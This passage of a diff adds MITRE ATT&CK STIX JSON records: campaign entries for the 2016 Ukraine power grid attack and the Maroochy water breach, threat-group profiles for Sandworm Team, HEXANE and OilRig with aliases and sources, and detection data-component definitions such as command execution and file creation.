}, + { + "modified": "2023-04-10T21:18:24.743Z", + "name": "2016 Ukraine Electric Power Attack", + "description": "[2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025) was a [Sandworm Team](https://attack.mitre.org/groups/G0034) campaign during which they used [Industroyer](https://attack.mitre.org/software/S0604) malware to target and disrupt distribution substations within the Ukrainian power grid. This campaign was the second major public attack conducted against Ukraine by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "aliases": [ + "2016 Ukraine Electric Power Attack" + ], + "first_seen": "2016-12-01T05:00:00.000Z", + "last_seen": "2016-12-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_last_seen_citation": "(Citation: ESET Industroyer)(Citation: Dragos Crashoverride 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--aa73efef-1418-4dbe-b43c-87a498e97234", + "created": "2023-03-31T17:22:23.567Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0025", + "external_id": "C0025" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ] + }, + { + "modified": "2023-03-08T22:12:31.238Z", + "name": "Sandworm Team", + "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)\n\nIn October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)", + "aliases": [ + "Sandworm Team", + "ELECTRUM", + "Telebots", + "IRON VIKING", + "BlackEnergy (Group)", + "Quedagh", + "Voodoo Bear", + "IRIDIUM" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.0", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "created": "2017-05-31T21:32:04.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0034", + "external_id": "G0034" + }, + { + "source_name": "Voodoo Bear", + "description": "(Citation: CrowdStrike VOODOO BEAR)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "ELECTRUM", + "description": "(Citation: Dragos ELECTRUM)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Sandworm Team", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Quedagh", + "description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRIDIUM", + "description": "(Citation: Microsoft Prestige ransomware October 2022)" + }, + { + "source_name": "BlackEnergy (Group)", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "Telebots", + "description": "(Citation: NCSC Sandworm Feb 2020)(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "IRON VIKING", + "description": "(Citation: Secureworks IRON VIKING )(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020)" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.", + "url": "https://www.justice.gov/opa/page/file/1098481/download" + }, + { + "source_name": "Dragos ELECTRUM", + "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.dragos.com/resource/electrum/" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + }, + { + "source_name": "iSIGHT Sandworm 2014", + "description": "Hultquist, J.. (2016, January 7). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved October 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html" + }, + { + "source_name": "CrowdStrike VOODOO BEAR", + "description": "Meyers, A. (2018, January 19). Meet CrowdStrike’s Adversary of the Month for January: VOODOO BEAR. Retrieved May 22, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New “Prestige” ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + }, + { + "source_name": "InfoSecurity Sandworm Oct 2014", + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.", + "url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + }, + { + "source_name": "NCSC Sandworm Feb 2020", + "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020.", + "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory" + }, + { + "source_name": "USDOJ Sandworm Feb 2020", + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "url": "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "Secureworks IRON VIKING ", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking" + }, + { + "source_name": "UK NCSC Olympic Attacks October 2020", + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "url": "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:14:39.124Z", + "name": "Command Execution", + "description": "The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )", + "x_mitre_data_source_ref": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-05T22:00:43.353Z", + "name": "Maroochy Water Breach", + "description": "[Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020) was an incident in 2000 where an adversary leveraged the local government’s wastewater control system and stolen engineering equipment to disrupt and eventually release 800,000 liters of raw sewage into the local community.(Citation: Marshall Abrams July 2008)", + "aliases": [ + "Maroochy Water Breach" + ], + "first_seen": "2000-02-01T05:00:00.000Z", + "last_seen": "2000-04-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_last_seen_citation": "(Citation: Marshall Abrams July 2008)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "created": "2023-03-10T20:01:08.133Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0020", + "external_id": "C0020" + }, + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + }, + { + "modified": "2022-10-07T16:16:55.269Z", + "name": "Script Execution", + "description": "The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)", + "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Flow", + "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Module Load", + "description": "Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)", + "x_mitre_data_source_ref": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.274Z", + "name": "Network Traffic Content", + "description": "Logged network traffic data showing both protocol header and body values (ex: PCAP)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Modification", + "description": "Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "name": "Process History/Live Data", + "description": "This includes any data stores that maintain historical or real-time events and telemetry recorded from various sensors or devices", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T04:43:59.082Z", + "name": "HEXANE", + "description": "[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)", + "aliases": [ + "HEXANE", + "Lyceum", + "Siamesekitten", + "Spirlin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Mindaugas Gudzis, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1001", + "external_id": "G1001" + }, + { + "source_name": "Spirlin", + "description": "(Citation: Accenture Lyceum Targets November 2021)" + }, + { + "source_name": "Siamesekitten", + "description": "(Citation: ClearSky Siamesekitten August 2021)" + }, + { + "source_name": "Lyceum", + "description": "(Citation: SecureWorks August 2019)" + }, + { + "source_name": "Accenture Lyceum Targets November 2021", + "description": "Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.", + "url": "https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns" + }, + { + "source_name": "ClearSky Siamesekitten August 2021", + "description": "ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.", + "url": "https://www.clearskysec.com/siamesekitten/" + }, + { + "source_name": "Dragos Hexane", + "description": "Dragos. (n.d.). Hexane. Retrieved October 27, 2019.", + "url": "https://dragos.com/resource/hexane/" + }, + { + "source_name": "Kaspersky Lyceum October 2021", + "description": "Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.", + "url": "https://vblocalhost.com/uploads/VB2021-Kayal-etal.pdf" + }, + { + "source_name": "SecureWorks August 2019", + "description": "SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19 ", + "url": "https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-05-11T16:22:58.802Z", + "created": "2022-05-11T16:22:58.802Z", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "name": "Device Alarm", + "description": "This includes alarms associated with unexpected device functions, such as shutdowns, restarts, failures, or configuration changes", + "x_mitre_version": "1.0", + "x_mitre_data_source_ref": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T21:47:33.604Z", + "name": "Software", + "description": "This includes sources of current and expected software or application programs deployed to a device, along with information on the version and patch level for vendor products, full source code for any application programs, and unique identifiers (e.g., hashes, signatures).", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "created": "2022-09-23T16:36:08.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Termination", + "description": "Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Creation", + "description": "Initial construction of a new file (ex: Sysmon EID 11)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Modification", + "description": "Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { + "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--4dcd8ba3-2075-4f8b-941e-39884ffaac08", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 